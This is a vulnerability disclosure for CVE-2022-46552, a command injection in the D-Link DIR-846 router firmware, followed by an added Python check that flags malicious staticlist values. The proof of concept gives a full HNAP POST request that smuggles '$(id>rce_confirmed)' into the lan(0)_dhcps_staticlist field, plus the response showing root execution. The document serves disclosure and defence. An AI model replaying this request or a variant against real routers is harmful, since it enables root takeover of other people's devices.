CVE-2022-46552: D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has vulnerability that leads to a RCE

1. Vulnerability Information

Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.

Affiliation: Aeronautics Institute of Technology (ita.br)

Common Weakness Enumeration: CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

Vulnerability details: The exploitation method is a command injection through authenticated user input containing special characters. In this case, the file SetIpMacBindSettings.php (line 79) contains an exec call whose user input is only partially sanitized. Thus, an attacker can execute arbitrary commands by sending a maliciously crafted payload in a POST request. The HTTP message body is JSON-encoded and has the lan(0)_dhcps_staticlist key, a string of comma-separated values. The attacker must place the malicious payload in the second value, causing the web server on the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system.

Vendor of the product: D-LINK

Affected product: DIR-846

Affected Version: Firmware DIR846enFW100A53DBR-Retail

Vulnerability Score (CVSS v3.1): 9.1 High, vector AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Dates info:

Vulnerability discovered: 30/11/2022

First attempt to contact vendor: 01/12/2022

Request CVE ID (MITRE): 01/12/2022

Date Record Created (MITRE): 05/12/2022

First vendor response: 08/12/2022

CVE Assignment Team response: 10/01/2023

Second attempt to contact vendor: 01/12/2022

CVE published in the CVE List:

2. Proof of Concept

Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter (Authenticated)

Google Dork: NA

Date: 30/01/2023

Exploit Author: Françoa Taffarel

Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte

Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip

Version: DIR846enFW100A53DBR-Retail

Tested on: D-LINK DIR-846

CVE: CVE-2022-46552

D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

Malicious POST Request

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4

{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68

{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}

Data from RCE Request

GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35

uid=0(root) gid=0(root)
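The hostname field of lan(0)_dhcps_staticlist is what reaches the shell unescaped, so a proxy, WAF or firmware-side handler can reject a request like the PoC above before it reaches exec. The following is an added example for that check, not code from the advisory or from D-Link; the per-lease field layout (enable flag, hostname, MAC, IPv4) is assumed from the PoC body, and the sample bodies are constructed.

```python
import json
import re

# Assumed field layout per static lease, inferred from the PoC body
# "1,<hostname>,<mac>,<ipv4>"; not taken from vendor documentation.
FIELDS_PER_ENTRY = 4
STATICLIST_KEY = re.compile(r"^lan\(\d+\)_dhcps_staticlist$")
# Characters that let a value break out of a double-quoted shell argument
SHELL_META = re.compile(r"[`$|;&<>(){}\\\"'\n]")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]{0,62}$")
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
OCTET = r"(25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4_RE = re.compile(rf"^{OCTET}(\.{OCTET}){{3}}$")


def check_staticlist(body: str) -> list:
    """Return findings for one HNAP SetIpMacBindSettings JSON body (empty = clean)."""
    try:
        settings = json.loads(body).get("SetIpMacBindSettings", {})
    except (ValueError, AttributeError):
        return ["body is not a JSON object"]
    findings = []
    for key, raw in settings.items():
        if not STATICLIST_KEY.match(key) or not isinstance(raw, str):
            continue
        parts = raw.split(",")
        if len(parts) % FIELDS_PER_ENTRY:
            findings.append(f"{key}: {len(parts)} fields, not a multiple of {FIELDS_PER_ENTRY}")
        for n, i in enumerate(range(0, len(parts) - FIELDS_PER_ENTRY + 1, FIELDS_PER_ENTRY)):
            enable, name, mac, ip = parts[i:i + FIELDS_PER_ENTRY]
            if SHELL_META.search(name):
                findings.append(f"{key} entry {n}: shell metacharacters in hostname {name!r}")
            elif not HOSTNAME_RE.match(name):
                findings.append(f"{key} entry {n}: hostname {name!r} is not a plain DNS label")
            if enable not in ("0", "1"):
                findings.append(f"{key} entry {n}: enable flag {enable!r} is not 0/1")
            if not MAC_RE.match(mac):
                findings.append(f"{key} entry {n}: malformed MAC {mac!r}")
            if not IPV4_RE.match(ip):
                findings.append(f"{key} entry {n}: malformed IPv4 {ip!r}")
    return findings


# Constructed samples: the advisory's PoC body and a benign equivalent.
POC_BODY = ('{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":'
            '"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}')
BENIGN_BODY = ('{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":'
               '"1,printer-01,02:42:d6:f9:dc:4e,192.168.0.15"}}')

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, check_staticlist(body) or "clean")
```

Rejecting the request on any finding is the safe default; the same allow-list pattern applied in the PHP handler before exec (rather than a deny-list of metacharacters) is the actual fix.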